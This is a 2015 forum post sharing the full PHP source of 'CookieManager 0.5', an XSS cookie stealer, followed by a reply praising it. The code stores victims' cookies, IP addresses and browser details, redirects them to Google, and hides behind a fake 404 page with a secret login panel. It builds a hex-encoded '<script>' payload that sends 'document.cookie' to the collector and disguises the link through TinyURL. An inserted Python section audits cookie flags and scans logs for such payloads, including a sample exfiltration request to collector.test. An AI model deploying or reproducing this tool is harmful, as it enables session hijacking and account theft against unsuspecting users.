[PHP] CookieManager 0.5


BigBear
« on: February 06, 2015, 02:10:03 pm »
A simple PHP program to help with the XSS vulnerability; this program has the following options:

  • Cookie Stealer with TinyURL generator
  • You can see the cookies a page returns
  • You can create cookies with whatever data you want
  • Hidden panel with login; use ?poraca to find the login


A video with usage examples:



The code:

Code: PHP
<?php

// CookieManager 0.5
// (C) Doddy Hackman 2015

// Login credentials

$username = "admin";
$password = "21232f297a57a5a743894a0e4a801fc3"; //admin

//

// DB settings

$host  = "localhost";
$userw = "root";
$passw = "";
$db    = "cookies";

//


// Functions

function hex_encode($text)
{
    $texto = [filtered]([filtered]($text), 2, '%');
    return $texto = '%' . [filtered]($texto, 0, [filtered]($texto) - 1);
}

function parsear_cookie($leyendo)
{

    $leyendo   = [filtered]("comment=", "", $leyendo);
    $leyendo   = [filtered]("Set-Cookie: ", "", $leyendo);
    $contenido = [filtered](";", $leyendo);

    $nombre       = "";
    $valor_cookie = "";
    $expires      = "";
    $path         = "";
    $domain       = "";
    $secure       = "false";
    $httponly     = "false";

    foreach ($contenido as $valor) {

        if ([filtered]("/expires=(.*)/", $valor, $regex)) {
            $expires = $regex[1];
        }

        elseif ([filtered]("/path=(.*)/", $valor, $regex)) {
            $path = $regex[1];
        } elseif ([filtered]("/domain=(.*)/", $valor, $regex)) {
            $domain = $regex[1];
        } elseif ([filtered]("/secure=(.*)/", $valor, $regex)) {
            $secure = $regex[1];
        } elseif ([filtered]("/httponly=(.*)/", $valor, $regex)) {
            $httponly = $regex[1];
        }

        else {

            if ([filtered]("/(.*)=(.*)/", $valor, $regex)) {
                $nombre       = $regex[1];
                $valor_cookie = $regex[2];
            }

        }

    }

    return [filtered](
        $nombre,
        $valor_cookie,
        $expires,
        $path,
        $domain,
        $secure,
        $httponly
    );

}

function ver_cookies_de_pagina($pagina)
{
    $cookies = "";
    if (![filtered]('curl_exec')) {
        $options = [filtered](
            'http' => [filtered](
                'user_agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0'
            )
        );
        $context = [filtered]($options);
        [filtered]($pagina);
        foreach ($http_response_header as $valores) {
            if ([filtered]("/Set-Cookie/", $valores)) {
                $valores = [filtered]("Set-Cookie:", "", $valores);
                $cookies = $cookies . $valores . "<br>";
            }
        }
    } else {
        $nave = [filtered]($pagina);
        [filtered]($nave, CURLOPT_TIMEOUT, 5);
        [filtered]($nave, CURLOPT_RETURNTRANSFER, 1);
        [filtered]($nave, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0");
        [filtered]($nave, CURLOPT_HEADER, 1);
        [filtered]($nave, CURLOPT_NOBODY, 1);
        $contenido = [filtered]($nave);
        [filtered]($nave);
        $leyendo = [filtered]("\n", [filtered]($contenido));

        foreach ($leyendo as $valores) {
            if ([filtered]("/Set-Cookie/", $valores)) {
                $valores = [filtered]("Set-Cookie:", "", $valores);
                $cookies = $cookies . $valores . "<br>";
            }
        }
    }
    return $cookies;
}

function toma($target)
{
    $code = "";
    if ([filtered]('curl_exec')) {
        $nave = [filtered]($target);
        [filtered]($nave, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0');
        [filtered]($nave, CURLOPT_TIMEOUT, 5);
        [filtered]($nave, CURLOPT_RETURNTRANSFER, true);
        $code = [filtered]($nave);
    } else {
        $options = [filtered](
            'http' => [filtered](
                'user_agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0'
            )
        );
        $context = [filtered]($options);
        $code    = [filtered]($target);
    }
    return $code;
}

//

[filtered](0);

[filtered]($host, $userw, $passw);
[filtered]($db);

if ([filtered]($_GET['id'])) {

    if ([filtered]($_GET['id'])) {
        error();
    }

    $dia = [filtered]([filtered]("d.m.Y"));
    $ip  = [filtered]($_SERVER["REMOTE_ADDR"]);

    if ($ip == "::1") {
        $ip = "127.0.0.1";
    }

    $info = [filtered]($_SERVER["HTTP_USER_AGENT"]);
    $ref  = [filtered]($_SERVER["HTTP_REFERER"]);

    $cookie = [filtered]($_GET['id']);

    [filtered]("INSERT INTO todo(id,fecha,ip,info,cookie) values(NULL,'$dia','$ip','$info','$cookie')");

    [filtered]("Location:http://www.google.com.ar");

}

elseif ([filtered]($_COOKIE['portal'])) {

    $st = [filtered]($_COOKIE['portal']);

    $plit = [filtered]("@", $st);
    $user = $plit[0];
    $pass = $plit[1];

    if ($user == $username and $pass == $password) {

        if ([filtered]($_POST['makecookies'])) {
            //setcookie($_POST['name_cookie'],$_POST['value_cookie'],$_POST['expire_cookie'],$_POST['path_cookie'],$_POST['domain_cookie'],$_POST['secure_cookie'],$_POST['httponline_cookie'])) {

            if ([filtered]($_POST['name_cookie'], $_POST['value_cookie'], [filtered]() + 7200, $_POST['path_cookie'], $_POST['domain_cookie'])) {
                echo "<script>alert('Cookies Maked');</script>";
            } else {
                echo "<script>alert('Error making Cookie');</script>";
            }
        }

        echo "<title>CookieManager 0.3</title>";

        echo "<STYLE type=text/css>

body,a:link {
background-color: #000000;
color:orange;
Courier New;
cursor:crosshair;
font-size: small;
}

input,table.outset,table.bord,table,textarea,select,fieldset,td,tr {
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
background-color:black;
color:orange;
border: solid 1px orange;
border-color:orange
}

a:link,a:visited,a:active {
color: orange;
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}

</style>
";

        $edit_name       = "";
        $edit_value      = "";
        $edit_expire     = "";
        $edit_path       = "";
        $edit_domain     = "";
        $edit_secure     = "";
        $edit_httponline = "";

        if ([filtered]($_POST['instalar'])) {

            $todo = "create table todo (
id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
fecha TEXT NOT NULL,
ip TEXT NOT NULL,
info TEXT NOT NULL,
cookie TEXT NOT NULL,
PRIMARY KEY (id));
";

            if ([filtered]($todo)) {
                echo "<script>alert('Installed');</script>";
            } else {
                echo "<script>alert('Error');</script>";
            }
        }

        if ([filtered]([filtered]("show tables like 'todo'"))) {

            //

            if ([filtered]($_GET['del'])) {
                if ([filtered]($_GET['del'])) {
                    if (@[filtered]("delete from todo where id='" . $_GET['del'] . "'")) {
                        echo "<script>alert('Deleted');</script>";
                    } else {
                        echo "<script>alert('Error');</script>";
                    }
                }
            }

            echo "<center>";
            echo "<br><h1>CookieManager</h1><br>";


            // Cookies Found


            $re  = [filtered]("select * from todo order by id ASC");
            $con = [filtered]($re);

            if ($con == 0) {
                echo "<script>alert('Cookies not found');</script>";
            } else {

                echo "<table border=1 width=1100><td width=1100><center><h2>Cookies Found : $con</h2></center></table>";
                echo "<table border=1 width=1100>";
                echo "<td><b>ID</b></td><td><b>Date</b></td><td><b>IP</b></td><td><b>Data</b></td><td><b>Cookie</b></td><td><b>Name</b></td><td><b>Value</b></td><td><b>Option</b></td><tr>";

                while ($ver = [filtered]($re)) {
                    $cookies_view = $ver[4];
                    [filtered]($nombre, $valor_cookie, $expires, $path, $domain, $secure, $httponly) = parsear_cookie($cookies_view);

                    echo "<td>" . [filtered]($ver[0]) . "</td><td>" . [filtered]($ver[1]) . "</td><td>" . [filtered]($ver[2]) . "</td><td>" . [filtered]($ver[3]) . "</td>";
                    echo "<td>" . [filtered]($cookies_view) . "</td><td>" . [filtered]($nombre) . "</td><td>" . [filtered]($valor_cookie) . "</td><td><a href=?del=" . [filtered]($ver[0]) . ">Del</a></td><tr>";

                }

                echo "</table>";

            }

            //

            // Target form

            echo "
<form action='' method=POST>
<center><br><table border=1>
<td><center><h2>Enter Target</h2></center></td><tr>
<td><input type=text size=50 name=target value='http://localhost/dhlabs/xss/index.php?msg='=></td><tr>
<td><input type=submit name=getcookies style='height: 25px; width: 100px' value='Get Cookies'><input type=submit name=generateurl style='height: 25px; width: 100px' value=Generate URL></td>
</table></center>
</form>

";

            // URLS

            if ([filtered]($_POST['generateurl'])) {
                echo "<br><table border=1>
<td><center><h2>URL Generated</h2></center></td><tr>
<td><textarea cols=50 name=code readonly>\n";
                $script         = hex_encode("<script>document.location='http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?id='+document.cookie;</script>");
                //echo "http://tinyurl.com/api-create.php?url=".$_POST['target'].$script."\n";
                $resultado_code = toma("http://tinyurl.com/api-create.php?url=" . $_POST['target'] . $script);
                echo [filtered]($resultado_code);
                echo "\n</textarea></td></table>";
            }
            //

            // Get Cookies

            if ([filtered]($_POST['getcookies'])) {
                echo "<br><table border=1>
<td><center><h2>Console</h2></center></td><tr>
<td><textarea cols=50 rows=10 name=code readonly>\n";
                $resultado_code = ver_cookies_de_pagina($_POST['target']);
                echo [filtered]($resultado_code);
                echo "\n</textarea></td></table>";

                $leyendo_esto = [filtered]("\n", $resultado_code);

                [filtered]($nombre, $valor_cookie, $expires, $path, $domain, $secure, $httponly) = parsear_cookie($leyendo_esto[0]);

                $edit_name       = $nombre;
                $edit_value      = $valor_cookie;
                $edit_expire     = $expires;
                $edit_path       = $path;
                $edit_domain     = $domain;
                $edit_secure     = $secure;
                $edit_httponline = $httponly;

            }

            //

            // Form to create cookies

            echo "
<form action='' method=POST>
<center><br><table border=1>
<td><center><h2>Cookies Maker</h2></center></td><tr>
<td>Name : <input type=text size=50 name=name_cookie value='$edit_name'=></td><tr>
<td>Value : <input type=text size=50 name=value_cookie value='$edit_value'=></td><tr>
<td>Expires : <input type=text size=50 name=expire_cookie value='$edit_expire'=></td><tr>
<td>Path : <input type=text size=50 name=path_cookie value='$edit_path'=></td><tr>
<td>Domain : <input type=text size=50 name=domain_cookie value='$edit_domain'=></td><tr>
<td>Secure : <input type=text size=50 name=secure_cookie value='$edit_secure'=></td><tr>
<td>HTTP Online : <input type=text size=50 name=httponline_cookie value='$edit_httponline'=></td><tr>
<td><input type=submit name=makecookies style='height: 25px; width: 100px' value='Make Cookies'></td>
</table></center>
</form>";

            //

            //

            echo "<br><h1>(C) Doddy Hackman 2015</h1><br><br>";

            //

        } else {
            echo "
<center><br><br>
<form action='' method=POST>
<h2>Deseas instalar CookieManager ?</h2><br><br>
<input type=submit name=instalar value=Instalar>
</form>";
        }
        [filtered](1);
    }
} elseif ([filtered]($_POST['login'])) {
    if ($_POST['user'] == $username and [filtered]($_POST['password']) == $password) {
        [filtered]("portal", [filtered]($_POST['user'] . "@" . [filtered]($_POST['password'])));
        echo "<script>alert('Welcome idiot');</script>";
        echo '<meta http-equiv="refresh" content=0;URL=>';
    } else {
        echo "<script>alert('Continued to participate');</script>";
    }
} elseif ([filtered]($_GET['poraca'])) {

    echo "

<STYLE type='text/css'>

body,input {
background-color: #000000;
color:orange;
font-family:
Courier New;
cursor:crosshair;
font-size: small;
}
</style>

<h1><br><center><font color=green>Login</font></center></h1>
<br><br><center>
<form action='' method=POST>
Username : <input type=text name=user><br>
Password : <input type=password name=password><br><br>
<input type=submit name=login value=Enter><br>
</form>
</center><br><br>";
} else {

    error();

}

function error()
{
    echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>';
    [filtered](1);
}


[filtered]();

// The End ?


?>


If you want to download the program you can do so from here:

You are not allowed to view links. Register or Login.
You are not allowed to view links. Register or Login.
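The tool above works only when the victim site sets its session cookie without HttpOnly (so `document.cookie` can read it) and reflects attacker input into the page. The following added example, written for this corpus and not part of the original post or of CookieManager, shows the defender's side of both facts: it parses Set-Cookie headers per RFC 6265 (treating Secure and HttpOnly as valueless flags, which a regex such as `secure=(.*)` would never match) and reports which cookies an injected script could read, and it scans constructed web-server log lines for the reflected payload shape the generator emits (URL-encoded `<script>` with `document.cookie`). All header and log samples are constructed; the host `collector.test` is a placeholder.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed sample Set-Cookie headers (not captured from any real site).
SAMPLE_HEADERS = [
    "Set-Cookie: PHPSESSID=abc123; path=/",
    "Set-Cookie: session=xyz; Path=/; Domain=.example.test; Secure; HttpOnly; SameSite=Lax",
    "Set-Cookie: tracking=1; Expires=Wed, 21 Oct 2015 07:28:00 GMT; SameSite=None",
]

# Constructed access-log lines in Apache combined format; the second one carries
# a percent-encoded reflected-XSS payload of the kind the page's generator builds.
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Feb/2015:14:10:03 -0300] "GET /index.php?msg=hola HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [06/Feb/2015:14:11:47 -0300] "GET /index.php?msg=%3c%73%63%72%69%70%74%3e'
    'document.location%3d%27http%3a%2f%2fcollector.test%2Fcm.php%3fid%3d%27%2bdocument.cookie'
    '%3b%3c%2f%73%63%72%69%70%74%3e HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]


@dataclass
class Cookie:
    name: str
    value: str
    # Lower-cased attribute name -> value; None for valueless flags (Secure, HttpOnly).
    attrs: Dict[str, Optional[str]] = field(default_factory=dict)


def parse_set_cookie(header: str) -> Cookie:
    """Parse one Set-Cookie line: the first pair is name=value, the rest are attributes."""
    line = header.strip()
    if re.match(r"(?i)set-cookie:", line):
        line = line.split(":", 1)[1]
    parts = [p.strip() for p in line.split(";")]
    name, _, value = parts[0].partition("=")
    cookie = Cookie(name.strip(), value.strip())
    for attr in parts[1:]:
        if not attr:
            continue
        key, sep, val = attr.partition("=")
        cookie.attrs[key.strip().lower()] = val.strip() if sep else None
    return cookie


def audit_cookie(cookie: Cookie) -> List[str]:
    """Findings that matter against a document.cookie stealer and plain-HTTP leakage."""
    findings = []
    attrs = cookie.attrs
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable via document.cookie")
    if "secure" not in attrs:
        findings.append("missing Secure: sent over plain HTTP")
    if "samesite" not in attrs:
        findings.append("missing SameSite: browser default applies")
    elif (attrs["samesite"] or "").lower() == "none" and "secure" not in attrs:
        findings.append("SameSite=None without Secure: rejected by modern browsers")
    return findings


def audit_headers(headers: List[str]) -> Dict[str, List[str]]:
    """Map each cookie name to its findings; an empty list means the cookie is hardened."""
    return {c.name: audit_cookie(c) for c in map(parse_set_cookie, headers)}


def exposed_to_script(headers: List[str]) -> List[str]:
    """Names of cookies an injected script could read with document.cookie."""
    return [c.name for c in map(parse_set_cookie, headers) if "httponly" not in c.attrs]


def flag_xss_exfil(log_lines: List[str]) -> List[str]:
    """Client IPs whose request line, once URL-decoded, carries a script tag or document.cookie."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m:
            continue
        if re.search(r"(?i)<script|document\.cookie", unquote(m.group(1))):
            hits.append(line.split()[0])
    return hits


if __name__ == "__main__":
    for name, findings in audit_headers(SAMPLE_HEADERS).items():
        print(f"{name}: {'OK' if not findings else '; '.join(findings)}")
    print("suspicious clients:", flag_xss_exfil(SAMPLE_LOG))
```

Run it as-is to see the audit of the three sample cookies and the one flagged client; to check a real deployment, replace `SAMPLE_HEADERS` with the Set-Cookie lines from your own site's responses and `SAMPLE_LOG` with lines from your access log. Adding `HttpOnly` to the session cookie is the single change that makes the `document.cookie` payload return nothing.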

blackdrake
« Reply #1 on: February 07, 2015, 08:48:17 am »
It'll be nice to have a "manager" instead of collecting it in the usual txt haha

As always, great work Doddy ^^
